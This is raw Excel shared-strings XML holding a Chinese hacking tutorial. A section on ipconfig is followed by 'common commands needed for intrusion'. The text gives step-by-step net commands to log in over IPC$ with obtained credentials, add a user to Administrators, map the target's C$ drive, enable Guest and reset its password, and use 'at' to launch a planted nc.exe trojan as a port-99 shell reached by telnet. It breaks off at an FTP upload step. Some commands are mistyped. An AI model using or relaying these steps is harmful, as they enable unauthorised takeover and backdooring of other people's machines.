        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>Windows NT</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>。</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>winipcfg</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>不使用参数，直接运行它，它就会采用</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>Windows</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>窗口的形式显示具体信息。这些信息包括：网络适配器的物理地址、主机的</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>IP</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>地址、子网掩码以及默认网关等，点击其中的“其他信息”，还可以查看主机的相关信息如：主机名、</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>DNS</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>服务器、节点类型等。其中网络适配器的物理地址在检测网络错误时非常有用。</t>
    </r>
  </si>
  <si>
    <r>
      <t>ipconfig</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>的命令格式如下：</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>ipconfig [/? | /all | /release [adapter] | /renew [adapter]]</t>
    </r>
  </si>
  <si>
    <t>其中的参数说明如下：</t>
  </si>
  <si>
    <r>
      <t>使用不带参数的</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>ipconfig</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>命令可以得到以下信息：</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>IP</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>地址、子网掩码、默认网关。而使用</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>ipconfig</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve">/? </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>显示</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>ipconfig</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>的格式和参数的英文说明；</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve">/all </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>显示所有的配置信息；</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve">/release </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>为指定的适配器（或全部适配器）释放</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>IP</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>地址（只适用于</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>DHCP</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>）；</t>
    </r>
  </si>
  <si>
    <r>
      <t xml:space="preserve">/renew </t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>为指定的适配器（或全部适配器）更新</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>IP</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>地址（只适用于</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>DHCP</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>）。</t>
    </r>
  </si>
  <si>
    <r>
      <t>/all</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>，则可以得到更多的信息：主机名、</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>DNS</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>服务器、节点类型、网络适配器的物理地址、主机的</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>IP</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>地址、子网掩码以及默认网关等。</t>
    </r>
  </si>
  <si>
    <t>黑客必学的六条系统命令</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>黑客必学的六条系统命令</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>一般入侵所需要的几个常用命令</t>
  </si>
  <si>
    <r>
      <t>1</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>：</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>NET</t>
    </r>
  </si>
  <si>
    <r>
      <t>只要你拥有某</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>IP</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>的用户名和密码，那就用</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>IPC$</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>做连接吧！</t>
    </r>
  </si>
  <si>
    <r>
      <t>这里我们假如你得到的用户是</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>XC</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>，密码是</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>123456</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>。假设对方</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>IP</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>为</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>127.0.0.1</t>
    </r>
  </si>
  <si>
    <t>net use \\\\127.0.0.1\\ipc$ "123456" /user:"XC"</t>
  </si>
  <si>
    <t>退出的命令是</t>
  </si>
  <si>
    <t>net use \\\\127.0.0.1\\ipc$ /delte</t>
  </si>
  <si>
    <r>
      <t>下面的操作你必须登陆后才可以用</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>.</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>登陆的方法就在上面</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>.</t>
    </r>
  </si>
  <si>
    <t>----------------------</t>
  </si>
  <si>
    <r>
      <t>下面我们讲怎么创建一个用户，由于</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>SA</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>的权限相当于系统的超级用户</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>.</t>
    </r>
  </si>
  <si>
    <r>
      <t>我们加一个</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>XC</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>的用户密码为</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>123456</t>
    </r>
  </si>
  <si>
    <t>net user XC 123456 /add</t>
  </si>
  <si>
    <r>
      <t>只要显示命令成功</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>,</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>那么我们可以把他加入</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>Administrator</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>组了</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>.</t>
    </r>
  </si>
  <si>
    <t>net 123456 Administrators XC /add</t>
  </si>
  <si>
    <r>
      <t>这里是讲映射对方的</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>C</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>盘</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>,</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>当然其他盘也可以</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>,</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>只要存在就行了</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>.</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>我们这里把对方的</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>C</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>盘映射到本地的</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>Z</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>盘</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>.</t>
    </r>
  </si>
  <si>
    <t>net use z:\\\\127.0.0.1\\c$</t>
  </si>
  <si>
    <t>net start telnet</t>
  </si>
  <si>
    <r>
      <t>这样可以打开对方的</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>TELNET</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>服务</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>.</t>
    </r>
  </si>
  <si>
    <r>
      <t>这里是将</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>Guest</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>用户激活，</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>guest</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>是</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>NT</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>的默认用户，而且无法删除呢？不知道是否这样，我的</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>2000</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>就是删除不了它。</t>
    </r>
  </si>
  <si>
    <t>net user guest /active:yes</t>
  </si>
  <si>
    <r>
      <t>这里是把一个用户的密码改掉，我们把</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>guest</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>的密码改为</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>lovechina</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>，其他用户也可以的。只要有权限就行了呀！</t>
    </r>
  </si>
  <si>
    <t>net user guest lovechina</t>
  </si>
  <si>
    <t>2:at</t>
  </si>
  <si>
    <t>一般一个入侵者入侵后都会留下后门，也就是种木马了，你把木马传了上去，怎么启动他呢？</t>
  </si>
  <si>
    <r>
      <t>那么需要用</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>AT</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>命令，这里假设你已经登陆了那个服务器。</t>
    </r>
  </si>
  <si>
    <t>你首先要得到对方的时间，</t>
  </si>
  <si>
    <t>net time \\\\127.0.0.1</t>
  </si>
  <si>
    <r>
      <t>将会返回一个时间，这里假设时间为</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>12:1,</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>现在需要新建一个作业，其</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>ID=1</t>
    </r>
  </si>
  <si>
    <t>at \\\\127.0.0.1 12:3 nc.exe</t>
  </si>
  <si>
    <r>
      <t>这里假设了一个木马，名为</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>NC.EXE,</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>这个东西要在对方服务器上</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>.</t>
    </r>
  </si>
  <si>
    <r>
      <t>这里介绍一下</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>NC,NC</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>是</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>NETCAT</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>的简称</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>,</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>为了方便输入</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>,</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>一般会被改名</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>.</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>它是一个</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>TELNET</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>服务</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>,</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>端口为</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>99.</t>
    </r>
  </si>
  <si>
    <r>
      <t>等到了</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>12:3</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>就可以连接到对方的</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>99</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>端口</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>.</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>这样就给对方种下了木马</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>.</t>
    </r>
  </si>
  <si>
    <t>3:telnet</t>
  </si>
  <si>
    <r>
      <t>这个命令非常实用</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>,</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>它可以与远方做连接，不过正常下需要密码、用户</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>,</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>不过你给对方种了木马</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>,</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>直接连到这个木马打开的端口</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>.</t>
    </r>
  </si>
  <si>
    <t>telnet 127.0.0.1 99</t>
  </si>
  <si>
    <r>
      <t>这样就可以连到对方的</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>99</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>端口</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>.</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>那你就可以在对方运行命令了</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>,</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>这个也就是肉鸡</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>.</t>
    </r>
  </si>
  <si>
    <t>4:FTP</t>
  </si>
  <si>
    <r>
      <t>它可以将你的东西传到对方机子上</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>,</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>你可以去申请个支持</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>FTP</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>上传的空间</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>,</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>国内多的是</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>,</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>如果真的找不到</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>,</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>我给个</t>
    </r>
    <r>
      <rPr>
